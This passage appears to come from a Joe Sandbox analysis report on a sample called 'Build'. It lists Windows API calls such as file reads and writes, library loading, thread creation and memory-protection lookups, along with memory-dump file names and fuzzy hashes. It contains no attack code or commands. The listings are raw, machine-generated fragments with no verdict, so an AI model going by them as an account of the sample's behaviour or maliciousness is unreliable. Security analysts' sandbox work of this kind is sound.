                                                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B179
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B1AB
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B1CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2244327787-0
                                                                                                    • Opcode ID: d53c774b50e29a0e1ecb767a8f0d434bd1ccd6f7a13dd6737d962097a8b1eeb1
                                                                                                    • Instruction ID: 44df32c9c1a881322e48342b0cceab291ce26a990c98f10c62a9255c97f88ff0
                                                                                                    • Opcode Fuzzy Hash: d53c774b50e29a0e1ecb767a8f0d434bd1ccd6f7a13dd6737d962097a8b1eeb1
                                                                                                    • Instruction Fuzzy Hash: A611C23051C224EBDB205F21EC2466A37EDFB41362F504929F826852D6D774DE64DB51
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0094688D,00000000,00000000,?,0094D32B,0094688D,00000000,00000000,00000000,?,0094D528,00000006,FlsSetValue), ref: 0094D3B6
                                                                                                    • GetLastError.KERNEL32(?,0094D32B,0094688D,00000000,00000000,00000000,?,0094D528,00000006,FlsSetValue,0095AC00,FlsSetValue,00000000,00000364,?,0094BA77), ref: 0094D3C2
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0094D32B,0094688D,00000000,00000000,00000000,?,0094D528,00000006,FlsSetValue,0095AC00,FlsSetValue,00000000), ref: 0094D3D0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: a6ec537aed4d0c54e6280ce0a4b6718c904ec67506480e6b07e04accd93277e3
                                                                                                    • Instruction ID: 35c8f3618a4a75dd12991419a402316d5aca1e1797d6f77a90c08e111fd1521f
                                                                                                    • Opcode Fuzzy Hash: a6ec537aed4d0c54e6280ce0a4b6718c904ec67506480e6b07e04accd93277e3
                                                                                                    • Instruction Fuzzy Hash: CE01F73A326326ABCB214F7A9C44E57379CFF05BBAB110A24F916D7280DB24D80087E1
                                                                                                    APIs
                                                                                                      • Part of subcall function 009312F6: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00931315
                                                                                                      • Part of subcall function 009312F6: GetProcAddress.KERNEL32(0096C1F0,CryptUnprotectMemory), ref: 00931325
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000200,?,00931366), ref: 009313F9
                                                                                                    Strings
                                                                                                    • CryptUnprotectMemory failed, xrefs: 009313F1
                                                                                                    • CryptProtectMemory failed, xrefs: 009313B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                    • API String ID: 2190909847-396321323
                                                                                                    • Opcode ID: 072df83a7d3d687f5e5ef8aa4c16623b24f593d425823b833246e62f8be35a38
                                                                                                    • Instruction ID: 8cb486e5ae2f0cd217459826a8e9b30549dbbe1141628ff000fdeb19fc7bfbf6
                                                                                                    • Opcode Fuzzy Hash: 072df83a7d3d687f5e5ef8aa4c16623b24f593d425823b833246e62f8be35a38
                                                                                                    • Instruction Fuzzy Hash: 5E113B316083256BDF15AF32DC0597E3B68EF41724F058126FC11AB2B2D674AD419FD0
                                                                                                    APIs
                                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 00933129
                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000), ref: 00933170
                                                                                                      • Part of subcall function 00927BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00927BD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                    • String ID: CreateThread failed
                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                    • Opcode ID: 24067f3435ba465658d7b3d38eae0f4c544c08223bc8930b17e07294cd2691f3
                                                                                                    • Instruction ID: 12f1faa5abc0d59960501d680f7fe8adb7289e7502ad3e2aeeca4643f6dc54d6
                                                                                                    • Opcode Fuzzy Hash: 24067f3435ba465658d7b3d38eae0f4c544c08223bc8930b17e07294cd2691f3
                                                                                                    • Instruction Fuzzy Hash: FE01F9B138C7067FE3207FA1EC42F66B3A8EB81712F10012DF685671C4CAB0A8458B64
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0092F306,00000001,?,?,?,00000000,00937564,?,?,?,?), ref: 0092B9DE
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0092BA25
                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0092F306,00000001,?,?,?), ref: 0092BA51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$Handle
                                                                                                    • String ID:
                                                                                                    • API String ID: 4209713984-0
                                                                                                    • Opcode ID: b65beed991f1eea42b01505082ead9a6e03e6af881ad3440757cd488728109ec
                                                                                                    • Instruction ID: 2e2627c63837b085c8876f3deb0c71eb9bbf67cc94e2d21f4661422f392855a1
                                                                                                    • Opcode Fuzzy Hash: b65beed991f1eea42b01505082ead9a6e03e6af881ad3440757cd488728109ec
                                                                                                    • Instruction Fuzzy Hash: E231C235208326AFDB14CF20E848B6B77E9FB80715F144A1DF58167294CB74AD88CBA2
                                                                                                    APIs
                                                                                                      • Part of subcall function 0092E1EC: _wcslen.LIBCMT ref: 0092E1F2
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,0092BBD0,?,00000001,00000000,?,?), ref: 0092BF12
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,0092BBD0,?,00000001,00000000,?,?), ref: 0092BF45
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,0092BBD0,?,00000001,00000000,?,?), ref: 0092BF62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2260680371-0
                                                                                                    • Opcode ID: d5d2f284f356431b8856c6e89f23856fb833163d9f14204502030d63e741ec7c
                                                                                                    • Instruction ID: 7544b01c3827a08744b249bc0295c020d401d48df655c0e0890a6eacd0b7d82d
                                                                                                    • Opcode Fuzzy Hash: d5d2f284f356431b8856c6e89f23856fb833163d9f14204502030d63e741ec7c
                                                                                                    • Instruction Fuzzy Hash: E5112131214234AADB11BF32AE05BEE73DC9F09700F000464FA41D7095DB78DE81DB65
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0094DF08
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                    • Opcode ID: 9b694f82ad30651cfff1945e32bed0b0877e45ea4f0a3ab3ddecc67e6df23f3c
                                                                                                    • Instruction ID: f965b8283073ad761ec50fab7ce2c95b4b512eccdbcea57e1793ef58412bb177
                                                                                                    • Opcode Fuzzy Hash: 9b694f82ad30651cfff1945e32bed0b0877e45ea4f0a3ab3ddecc67e6df23f3c
                                                                                                    • Instruction Fuzzy Hash: 504108745083889ADF368F248C94FF6BBAEEB45304F1408EDE59A87142D275AE49DF20
                                                                                                    APIs
                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0094D62D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String
                                                                                                    • String ID: LCMapStringEx
                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                    • Opcode ID: 4639bc91314004c6f6f39a8b9cd3cb1bc656db541454e0fe1fcca6e20b3e3d4b
                                                                                                    • Instruction ID: cb8b8d46cda505ed9c2d7205155459d9d3d994ca6b6661107b6a8b7ea433394b
                                                                                                    • Opcode Fuzzy Hash: 4639bc91314004c6f6f39a8b9cd3cb1bc656db541454e0fe1fcca6e20b3e3d4b
                                                                                                    • Instruction Fuzzy Hash: AA015A3250520CBBCF129F91DD02EEE7F66EF8C715F014114FE1866160C6769931EB85
                                                                                                    APIs
                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0094CBBF), ref: 0094D5A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                    • Opcode ID: 8fe1af185d7b0a61521b817de36c3526d4217da09aae5208d35ea5f2ceff971f
                                                                                                    • Instruction ID: 42746c1d33e2a5316eac86efc34e6375656ffe161d8886582c3b6fb9f25a4e4c
                                                                                                    • Opcode Fuzzy Hash: 8fe1af185d7b0a61521b817de36c3526d4217da09aae5208d35ea5f2ceff971f
                                                                                                    • Instruction Fuzzy Hash: 5FF0593164521CBBCF009F62CC02DADBF60DF88712B004226FC0417260CA715E10E784
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Alloc
                                                                                                    • String ID: FlsAlloc
                                                                                                    • API String ID: 2773662609-671089009
                                                                                                    • Opcode ID: 347c78f1ed8ff75e80f5e7664fe8421e313725a1e94a6ad63347144c00b0de98
                                                                                                    • Instruction ID: 945642b421824108ebb4eb24f2db06243448b0bb7e4a6837f2af9696957c68ff
                                                                                                    • Opcode Fuzzy Hash: 347c78f1ed8ff75e80f5e7664fe8421e313725a1e94a6ad63347144c00b0de98
                                                                                                    • Instruction Fuzzy Hash: 9AE02B30B46318A7D710ABA69C12F7DBBA5CFC8712F800269FC1557290CDB56E40A7DA
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009410BA
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: 3To
                                                                                                    • API String ID: 1269201914-245939750
                                                                                                    • Opcode ID: d4c5590416db6b47b8dc0abaf07d03480c17cc7279bbf61a6d0b2e3b3220004c
                                                                                                    • Instruction ID: a30593db0af1406786539ce2d5c6b115c6481fcd65decb2c339e66b157d5eb7a
                                                                                                    • Opcode Fuzzy Hash: d4c5590416db6b47b8dc0abaf07d03480c17cc7279bbf61a6d0b2e3b3220004c
                                                                                                    • Instruction Fuzzy Hash: B2B012E139D300FC322471C5AC12C36030CC0C0B29330CE2EF804C00C094586CCC5232
                                                                                                    APIs
                                                                                                      • Part of subcall function 0094DE0B: GetOEMCP.KERNEL32(00000000,?,?,0094E094,?), ref: 0094DE36
                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0094E0D9,?,00000000), ref: 0094E2B4
                                                                                                    • GetCPInfo.KERNEL32(00000000,0094E0D9,?,?,?,0094E0D9,?,00000000), ref: 0094E2C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CodeInfoPageValid
                                                                                                    • String ID:
                                                                                                    • API String ID: 546120528-0
                                                                                                    • Opcode ID: 825eac275802066e30add7c8e9b2f6e3a34521eeda912c1d1017a0a07f3eba74
                                                                                                    • Instruction ID: eaa48e46238ec21c2b40a488cac6bb97d4456dbf4fcb1bb9e6a3fefe38cbc382
                                                                                                    • Opcode Fuzzy Hash: 825eac275802066e30add7c8e9b2f6e3a34521eeda912c1d1017a0a07f3eba74
                                                                                                    • Instruction Fuzzy Hash: 995114719046059FDB26CF75C885EBBBBE9FF81300F1449AED0968B251D739A941CB90
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,0092B43B,00000800,00000800,00000000,?,?,0092A31D,?), ref: 0092B5EB
                                                                                                    • GetLastError.KERNEL32(?,?,0092A31D,?,?,?,?,?,?,?,?), ref: 0092B5FA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 92079f4139acf9b196316931cd6f503310fc2ad8843220adaa73d0021a8e7cd5
                                                                                                    • Instruction ID: 08e8f6794ec725a9abc9d3ecf6b8c9fe6ff3358edd94c33d451569207781bb2a
                                                                                                    • Opcode Fuzzy Hash: 92079f4139acf9b196316931cd6f503310fc2ad8843220adaa73d0021a8e7cd5
                                                                                                    • Instruction Fuzzy Hash: A441F6316083658BD720AF65E4C4EAE73E9FF58320F10091DF5458B25AD7B8DC808B91
                                                                                                    APIs
                                                                                                      • Part of subcall function 0094B9A5: GetLastError.KERNEL32(?,009650C4,00946E12,009650C4,?,?,0094688D,?,?,009650C4), ref: 0094B9A9
                                                                                                      • Part of subcall function 0094B9A5: _free.LIBCMT ref: 0094B9DC
                                                                                                      • Part of subcall function 0094B9A5: SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BA1D
                                                                                                      • Part of subcall function 0094B9A5: _abort.LIBCMT ref: 0094BA23
                                                                                                      • Part of subcall function 0094E19E: _abort.LIBCMT ref: 0094E1D0
                                                                                                      • Part of subcall function 0094E19E: _free.LIBCMT ref: 0094E204
                                                                                                      • Part of subcall function 0094DE0B: GetOEMCP.KERNEL32(00000000,?,?,0094E094,?), ref: 0094DE36
                                                                                                    • _free.LIBCMT ref: 0094E0EF
                                                                                                    • _free.LIBCMT ref: 0094E125
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2991157371-0
                                                                                                    • Opcode ID: a769704bd250e63817448fc463f61150190b6b36f54151c9eec08057b3e1f383
                                                                                                    • Instruction ID: 994087d17906e0e3383b3123acbd82d88f964bb1497ad541e97731cf295ccc84
                                                                                                    • Opcode Fuzzy Hash: a769704bd250e63817448fc463f61150190b6b36f54151c9eec08057b3e1f383
                                                                                                    • Instruction Fuzzy Hash: 3631D431908208AFDB10EFA9D481FAD77F9FF84324F2540A9F5149B291EBB69D41DB40
